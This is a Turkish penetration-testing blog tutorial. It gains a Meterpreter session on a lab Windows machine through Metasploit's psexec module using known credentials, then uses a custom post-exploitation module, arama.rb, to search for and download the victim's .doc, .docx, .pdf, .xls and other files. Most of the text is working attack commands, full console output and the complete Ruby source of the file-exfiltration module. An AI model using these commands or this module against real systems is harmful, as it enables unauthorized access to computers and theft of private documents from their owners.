5 Kasım 2012

Meterpreter Oturumu Üzerinden Dosya Toplama

Posted by: Fırat Celal Erdik 5 Kasım 2012

Bu makalede, metasploit kullanırak meterpreter oturumu elde edilmiş bir kurban makine üzerinde istenilen uzantılardaki dosyaların elde edilmesinin kolay bir yoluna değinilecektir.Bu işlemi yapan script ruby ile geliştirilmiştir ve metasploit modülü olarak çalışmaktadır.İlgili scripte arama.rb ismi verilmiştir.Öncelikle ilgili script metasploit kurulu olan dizine kopyalanmalıdır.
root@bt:~# cp arama.rb /opt/framework3/msf3/modules/post/windows/gather/

Arama.rb isimli script ilgili dizine kopyalandıktan sonra msfconsole komutu ile metasploit çalıştırılır.
root@bt:~# msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|
+       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
İlgili modül mevcut bir meterpreter oturumu gerektirdiğinden dolayı ,öncelikle bir meterpreter oturumu elde etmemiz gerekir.Makalede psexec exploiti kullanılarak, kullanıcı adını ve parolasını bildigimiz sistem üzerinde meterpreter oturumu elde edilmiştir.Siz herhangi bir güvenlik açığı kullanarak meterpreter oturumu elde edebilirsiniz.

İlgili exploiti kullanmak için ilgili komut şu şekildedir;
msf > use exploit/windows/smb/psexec 
Exploit ile ilgili parametre bilgilerini ve diğer bilgileri görmek için show options komutu kullanılmıştır.
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
Exploit target:
  Id  Name
   --  ----
   0   Automatic

Kurban makinanın IP adresi,kullanıcı adı ve şifresi parametre olarak psexec exploitine sağladıktan sonra exploit komutu ile meterpreter oturumu elde edilmiştir.
msf exploit(psexec) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(psexec) > set SMBUser celal
SMBUser => celal
msf exploit(psexec) > set SMBPass celal
SMBPass => celal
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.102:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'celal'...
[*] Uploading payload...
[*] Created \qxijEZlY.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (qelbKxTM - "MNxd")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.101
[*] Closing service handle...
[*] Deleting \qxijEZlY.exe...
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-03 18:31:18 +0200
Ele geçirilmiş oturum arka planda çalışırken metasploit kullanımına devam etmek için background komutu verilmiştir.Ardından arama.rb isimli post exploit modülü kullanılmıştır.
meterpreter > background
msf exploit(psexec) > use post/windows/gather/arama
msf post(arama) > show options

Module options (post/windows/gather/arama):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_TYPE                     no        Search for a specific file type based on extension. Ex *.gnmap, *.nbe
   GETDOC       false            no        Search and download all .doc files.
   GETDOCX      false            no        Search and download all .docx files.
   GETDRIVES    false            no        Search for a list of drives and display drive letters.
   GETPDF       false            no        Search and download all .pdf files.
   GETXLS       false            no        Search and download all .xls files.
   GETXLSX      false            no        Search and download all .xlsx files.
   SEARCH_FROM                   no        Search from a specified location. Ex. C:\, Run GETDRIVES first.
   SESSION                       yes       The session to run this module on.
Modül parametreleri hakkında bilgi vermek gerekirse;
·       FILE_TYPE parametresine istenilen bir uzantıda ve isimde dosya verilerek bunun aranması sağlanabilir.(*.gif , password.* , *kullanicilar*.xls  v.s)
·       GETDOC parametresine true değeri atanarak uzantısı  .DOC olan dosyalar bulunabilir.
·       GETDOCX parametresine true değeri atanarak uzantısı  .DOCX olan dosyalar bulunabilir.
·       GETDRIVES parametresine true değeri atanarak sistem üzerindeki  sürücüler (C,D v.s) görülebilir.
·       Yine aynı şekilde PDF dosyalarını bulmak için GETPDF,Excel dosyalarını bulmak için GETXLS,GETXLSX parametrelerine true değeri atanması yeterlidir.
·       SEARCH_FROM parametresine herhangi bir sürücü değeri(C:\ , D:\ v.s) atanarak bu bölümde dosya aranması sağlanabilir.

Şimdi kurban makinada .DOC uzantılı dosyaları bulup download edelim;
msf post(arama) > set GETDOC true
GETDOC => true
msf post(arama) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.

Verilen hatadan da anlaşılacağı üzere SESSION parametresi için bir ID bilgisi sağlanmak zorundadır.  Yani arkaplanda elde edilmiş bir meterpreter oturumumuz olmalıdır.Mevcut sessionları görmek için aşağıdaki komut koşturulabilir.
msf post(arama) > sessions -i

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBGA  192.168.1.102:4444 -> 192.168.1.101:1059
Şimdi SESSION parametresine oturum ID bilgisi olarak 1 verilerek kurban sistemdeki  .DOC uzantılı dosyaları  elegeçirelim.
msf post(arama) > set SESSION 1
SESSION => 1
msf post(arama) > set GETDOC true
GETDOC => true
msf post(arama) > exploit

[*]             Searching for and downloading Office Word documents...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\1720_63303.docx
[*] Downloading C:\Documents and Settings\celal\Templates\winword.doc
[*] Downloading C:\Documents and Settings\celal\Templates\winword2.doc
 [*] Done!
[*] Post module execution completed
Mevcut aramayı durdurmak için set komutu ile ilgili parametreye false değeri atanması yeterlidir.Şimdi .DOC uzantılı dosyaları tekrar aramaması için false değerini GETDOC parametresine atayıp .DOCX uzantılı dosyaları bulması için GETDOCX parametresine true değerini atayıp ilgili dosyaları  toplayalım.
msf post(arama) > set GETDOC false
GETDOC => false
msf post(arama) > set GETDOCX true
GETDOCX => true
msf post(arama) > exploit

[*]             Searching for and downloading Office 2007+ Word documents...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\1720_63303.docx
[*] Done!
[*] Post module execution completed
Aynı şekilde PDF uzantılı dosyaları bulmak istersek ;

msf post(arama) > set GETDOCX false
GETDOCX => false
msf post(arama) > set GETPDF true
GETPDF => true
msf post(arama) > exploit

[*]             Searching for and downloading Adobe pdf files...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\acikkodvpn.pdf
[*] Done!
[*] Post module execution completed
Şimdi ise kurban makinasının yalnızca C sürücüsündeki  .GIF uzantılı resim dosyalarını bulup download edelim;
msf post(arama) > set SEARCH_FROM C:\
SEARCH_FROM => C:\
msf post(arama) > set FILE_TYPE *.GIF
FILE_TYPE => *.GIF
msf post(arama) > exploit

[*]             Searching for and downloading gif image files...
[*]
 [*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\45ELNN7Z\chkmk_clrbkgrd[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\45ELNN7Z\plusCold[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\EVHXNJDD\important[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\EVHXNJDD\ua[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\FMEH1ROV\endnode[1].gif
 [*] Downloading C:\Program Files\Common Files\Microsoft Shared\Stationery\aleabanr.gif
 [*] Downloading C:\Program Files\Common Files\Microsoft Shared\Stationery\tech.gif
[*] Downloading C:\Program Files\Messenger\logowin.gif
 [*] Post module execution completed
msf post(arama) >
Not: Modül aracılığı ile aranan dosyalar /tmp dizini altına download edilmektedir.
Arama.rb dosyasının içeriği şu şekildedir:
require 'msf/core'
require 'msf/core/post/file'
class Metasploit3 < Msf::Post

                       include Msf::Post::File

                       def initialize(info={})
                                              super( update_info( info,
                                                                     'Name'          => 'Windows Gather Docs',
                                                                     'Description'   => %q{ This module gathers specific files from user directories. },
                                                                     'License'       => BSD_LICENSE,
                                                                     'Author'        => [ '3vi1john Jbabio@me.com'],
                                                                     'Version'       => '$Revision: 20 $',
                                                                     'Platform'      => [ 'windows' ],
                                                                     'SessionTypes'  => [ 'meterpreter' ]
                                              ))

                                              register_options(
                                                                     [
                                                                                            OptBool.new(  'GETDOC',   [ false, 'Search and download all .doc files.', false]),
                                                                                            OptBool.new(  'GETDOCX',   [ false, 'Search and download all .docx files.', false]),
                                                                                            OptBool.new(  'GETXLS',   [ false, 'Search and download all .xls files.', false]),
                                                                                            OptBool.new(  'GETXLSX',   [ false, 'Search and download all .xlsx files.', false]),
                                                                                            OptBool.new(  'GETPDF',   [ false, 'Search and download all .pdf files.', false]),
                                                                                            OptBool.new(  'GETDRIVES', [ false, 'Search for a list of drives and display drive letters.', false]),
                                                                                            OptString.new(  'SEARCH_FROM', [ false, 'Search from a specified location. Ex. C:\\, Run GETDRIVES first.']),
                                                                                            OptString.new(  'FILE_TYPE', [ false, 'Search for a specific file type based on extension. Ex *.gnmap, *.nbe'])
                                                                     ], self.class)
                       end

                       def get_drives
                       ##All Credit Goes to mubix for this railgun-FU
                                              a = client.railgun.kernel32.GetLogicalDrives()["return"]
                                              drives = []
                                              letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                                              (0..25).each do |i|
                                                                     test = letters[i,1]
                                                                     rem = a % (2**(i+1))
                                                                                            if rem > 0
                                                                                            drives << test
                                                                                            a = a - rem
                                                                                            end
                                                                     end
                                                                     print_status("Drives Available = #{drives.inspect}")
                       end

                       def download_doc_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = "*.doc"
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def download_docx_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = "*.docx"
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def download_xls_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = "*.xls"
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def download_xlsx_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = "*.xlsx"
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def download_pdf_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = "*.pdf"
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def download_ud_files
                                              location = datastore['SEARCH_FROM']
                                              file_type = datastore['FILE_TYPE']
                                              dest = "/tmp"
                                              sysnfo = client.sys.config.sysinfo['OS']
                                              if datastore['SEARCH_FROM']
                                                                     getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
                                              elsif sysnfo =~/Windows XP|2003|.NET/
                                                                     getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
                                              else sysnfo =~/Windows 7|Windows Vista|2008/
                                                                     getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
                                              end
                                              getfile.each do |file|
                                                                     print_status("Downloading #{file['path']}\\#{file['name']}")
                                                                     client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
                                                                     end
                       end

                       def run
                                              begin
                                                                     if datastore['GETDRIVES']
                                                                                            get_drives
                                                                     end
                                                                     if datastore['GETDOC']
                                                                                            print_status("\tSearching for and downloading Office Word documents...")
                                                                                            print_status("")
                                                                                            download_doc_files
                                                                     end
                                                                     if datastore['GETDOCX']
                                                                                            print_status("\tSearching for and downloading Office 2007+ Word documents...")
                                                                                            print_status("")
                                                                                            download_docx_files
                                                                     end
                                                                     if datastore['GETXLS']
                                                                                            print_status("\tSearching for and downloading Office Excel spreadsheets...")
                                                                                            print_status("")
                                                                                            download_xls_files
                                                                     end
                                                                     if datastore['GETXLSX']
                                                                                            print_status("\tSearching for and downloading Office 2007+ Excel spreadsheets...")
                                                                                            print_status("")
                                                                                            download_xlsx_files
                                                                     end
                                                                     if datastore['GETPDF']
                                                                                            print_status("\tSearching for and downloading Adobe pdf files...")
                                                                                            print_status("")
                                                                                            download_pdf_files
                                                                     end
                                                                     if datastore['FILE_TYPE']
                                                                                            download_ud_files
                                                                     end
                                                                     print_status("Done!")
                                              end
                                              rescue::Exception => e
                                                                     print_status("The following Error was encountered: #{e.class} #{e}")
                                              end
                       end

0 yorum:

Yorum Gönder

Her türlü eleştiri,yorum,ekleme ve düzeltmeye yönelik fikirlerinizi paylaşabilirsiniz.Hakaret içeren yorumlar filtrelenmektedir.

Makalelerin kötüye kullanım kullanıcının sorumluluğundadır. | networkpentest.net. Blogger tarafından desteklenmektedir.